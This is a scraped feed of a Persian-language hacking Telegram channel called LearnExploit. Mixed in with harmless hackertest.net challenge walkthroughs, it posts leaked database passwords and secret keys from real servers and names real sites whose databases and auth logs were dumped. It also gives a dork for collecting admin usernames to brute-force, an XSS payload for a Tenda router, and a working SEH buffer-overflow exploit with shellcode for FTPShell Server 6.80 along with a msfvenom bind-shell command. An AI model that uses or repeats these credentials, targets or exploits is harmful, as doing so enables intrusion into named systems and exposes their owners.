0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
:::: #AppConfig - #Github - #GitLab ::::
------------------
Fiti.app -[
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<connectionStrings>
<add name="AutoScoutDB" providerName="System.Data.SqlClient"
connectionString="user id=marc;password=marc;server=10.176.129.40;Integrated Security=no;database=eCommerce;connection timeout=30" />
</connectionStrings>
</configuration>
]-
===========
t.me/learnexploit
سایت hackertest.net
یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش
هر روز 3 مرحله رو با هم میریم
@soheileast
==========
Channel = @LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
سایت hackertest.net یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش هر روز 3 مرحله رو با هم میریم @soheileast ========== Channel = @LearnExploit
#Pentesting - #Part 1 - #hackertest_Net
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-source:http://www.hackertest.net/
<==
2 )
بخش زیر رو در صفحه پیدا کنید :

<script language=JavaScript>
{
var a="null";
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
}
else
{
alert ("Try again");
}
}
}
</script>
در اسکریپ بالا اپدا یک متغییر تعریف میکنه و مقدار null رو به اون میده
بعدش میاد میگه که اگر از کل صفحه مقدار برار a ینی همون null بود کد زیر رو برامون اجرا کن :
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
تو این کد به ما میگه که اگر مقدار درست بود مارو به صفحه ی
document.a.c.value = a or null
http://www.hackertest.net/null.htm
هدایت کن
——————————-
T.me/LearnExploit
0Day.Today Boy's
Forwarded from اتچ بات
#Pentesting - #Part 2 - #hackertest_Net
————————-
سلام خدمت دوستان
قسمت دوم اموزش
hackertest
نیز اماده شد.

توضیحات کامل در داخل فیلم گفته شده
فقط تنها نکته ای باید توجه کنیداینه که :

پسورد
131
نیست
بلکه
l3l
هست.
—————————
T.me/LeranExploit
0Day.Today Boy's
#Target #wp #Database
——————————
Target :
https://www.carisma.net/
\-------------\
Database :
yon.ir/SPRfx
\-------------\
file size : 1.6G
——————————-
T.me/LearnExploit
Forwarded from اتچ بات
#Target #wp #Database
——————————
Target :
http://geneseoschools.org/
——————————-
T.me/LearnExploit
#Xss #Bug In #Router (Tenda D152 ADSL Router)
و اینبار اسیب پذیری xss در روتر tenda :
برای مشاهده ی این اسیب پذیری وارد روتر
(Wifi Router Gateway)
خود شید :
http://Target/login
——
سپس به مسیر زیر برید :
General Setup --> Wireless --> Basic Settings
بعد SSID رو به
<script>alert("LearnExploit")</script>
تغییر بدید و پیج رو رفرش کنید :)
پاپ اپ LearnExploit قابل رویت است برای شما...
————————
T.me/LearnExploit
0Day.Today Boy's
#Dork | Get Username admin site or forums...
————————-
#Dork :
inurl:/profile.php?lookup=1

|Descriptions : |
دوستان این دورک user ادمین سایت رو میده
و شما میتونید از ان برای bruteforce استفاده کنید تا پسورد سایت رو بدست بیارید.
—————————
#GHDB
@LearnExploit
is.muni.cz.auth.log.txt
10.4 MB
#Target #Log #File :
————————-
Target :
https://is.muni.cz
————————-
@LearnExploit
#Datbase #User #Passwd
============================
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: null
database_name: basededattos
database_user: ruben
database_password: calipo123
mailer_transport: smtp
mailer_host: rubenpeib@gmail.com
mailer_user: null
mailer_password: null
locale: en
secret: 94f06f449a955c057befc3043d374fc9c0b21329
database_path: null
==============================
=== > see : http://159.149.130.120/ruben/app/config
============================================
@LearnExploit
#Pentesting - #Part 3 - #hackertest_Net
—————————————————-
سلام دوستان
با قسمت سوم (level 3) از اموزش hackertest با شما هستیم .
# به دلیل اینکه بیشتر موارد رو توضیح دادم دیگه توضیح نمیدم
خب یه نیگا به کد زیر بندازیم :
<body onload=javascript:pass(); alink="#000000">
<SCRIPT LANGUAGE="JavaScript">
function pass()
{
var pw, Eingabe;
pw = window.document.alinkColor;
Eingabe = prompt ("Please enter password");
if (Eingabe == pw)
{
window.location.href=String.fromCharCode(97,98,114,97,101)+".htm";
}
else
{
alert("Try again");
}
}
</SCRIPT>

مواردی که از کد بالا میفهمیم :
1) در خط پنجم یک مقدار تعریف میکنه تا این مقدار توسط کاربر وارد شه
2) در خط ششم این مقدار رو برابر
window.document.alinkColor;
قرار میده
مقدار بالا میگه که از کل صفحه مقدار alinkcolor رو برامون انتخاب کن
مقدار alinkcolor در تگ body :
#00000
میباشد .

یعنی کل موارد بالا == اگر ورودی کاربر مساوی #00000 بود مارو به
String.fromCharCode(97,98,114,97,101)+".htm";
هدایت کن
# = > شاید بپرسید 97,98,114,97,101 این اعداد اگر دیکد بشن چی میشه ؟
در جواب باید بگم
abrae
مقداری است که بعد از دیکد حاصل میشه...
3) در اخر هم بخش :
else
{
alert("Try again");
این است که اگر مقدار ورودی کاربر برابر #00000 نبود این عمل رو دوباره انجام بده.
—————————————————-
دوستان علت اینکه فیلم رکورد نمیکنم این هست که تا چند level موارد شبیه هم هستن و نیازی به رکورد نمیبینم و توضیح میدم.
امیدوارم که کسل کننده نباشه...
—————————————————-
T.me/LearnExploit
0Day.Today Boy's
Forwarded from اتچ بات
#BufferOverFlow (#BOF) #Bug
———————
سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید.
———————-
Dl Link :
yon.ir/bakJW
———————-
Recorded By Ashkan Mogadas
———————-
T.me/LearnExploit
0Day.Today Boy's
اتچ بات
‍ #BufferOverFlow (#BOF) #Bug ——————— سلام دوستان در این ویدویی اموزش یاد میگیرید که چطوری از باگ BoF استفاده کنید و از سیستم شل بگرید. ———————- Dl Link : yon.ir/bakJW ———————- Recorded By Ashkan Mogadas ———————- T.me/LearnExploit 0Day.Today Boy's
در پی این پست ...
post link : https://t.me/LearnExploit/381
خواستم مثال زنده براتون بزنم :
=============================================
#BufferOverFlow (#BOF) #Bug
اخرین اکسپلویتی که در این مورد ثبت شده مربوط به
FTPShell Server V 6.80
در قسمت
Add Account Name
میباشد.
لینک دانلود این نرم افزار :
http://www.ftpshell.com/downloadserver.htm
————
اکسپلویت :
#!/usr/bin/env python

shellcode = (
"\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1"
"\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c"
"\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59"
"\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14"
"\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93"
"\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1"
"\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8"
"\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf"
"\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25"
"\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d"
"\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73"
"\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74"
"\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2"
"\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1"
"\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6"
"\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e"
"\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff"
"\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc"
"\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19"
"\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74"
"\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b"
"\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11"
"\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39")

nSEH = "\xEB\x06\x90\x90"
SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI

buffer = "\x41" * 1268 + nSEH + SEH + shellcode
f = open ("FTPShell_Server_6.80.txt", "w")
f.write(buffer)
f.close()
————————————————
نحوه ی ساختن شل کد خودتون :
#msfvenom -p windows/shell_bind_tcp LHOST=270.0.0.1 LPORT=8080 -b '\x00\x0A\x0D' -f c -o /root/Desktop/
———————
# اگر برای دوستان نامفهوم هست لطفا به فیلم اموزشی توجه کنند.
———————
ولی من یه توضیحی هم میدم دربارش :
-p :
با این پیلود رو مشخص میکنه
-b :
لیست charcode هارو براتون میگه
-f :
نوع فرمت فایل خروجی رو براتون میگه
لیست کامل فرمت ها :
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript

-o
:
مسیر فایل خروجی

LHOST & LPORT
هم که پورت و ایپی هست که متاسپلویت روی اون شنود میکنه (در این قسمت باید LHOST & LPORT خودتون رو وارد کنید.)

———————————————
T.me/LearnExploit
0Day.Today Boy's